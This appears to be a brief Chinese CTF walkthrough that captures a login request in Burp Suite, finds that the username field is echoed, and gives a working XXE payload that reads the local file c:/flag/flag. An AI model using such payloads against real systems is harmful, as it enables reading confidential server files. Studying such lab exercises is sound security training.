进入环境
出现一个登录页面,输入任意 UserName 和 Psaaword ,使用bp抓取登录数据包
发送到重放器,点击“发送”
只修改 username 的值,查看右边的变化
只修改 password 的值,查看右边的变化
修改 username 和 password 的值,查看右边的变化
发现 username 位置为回显位,我们可以构造xxe攻击,具体操作如下
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///c:/flag/flag" > ]><user><username>&xxe;</username><password>1</password>
</user>
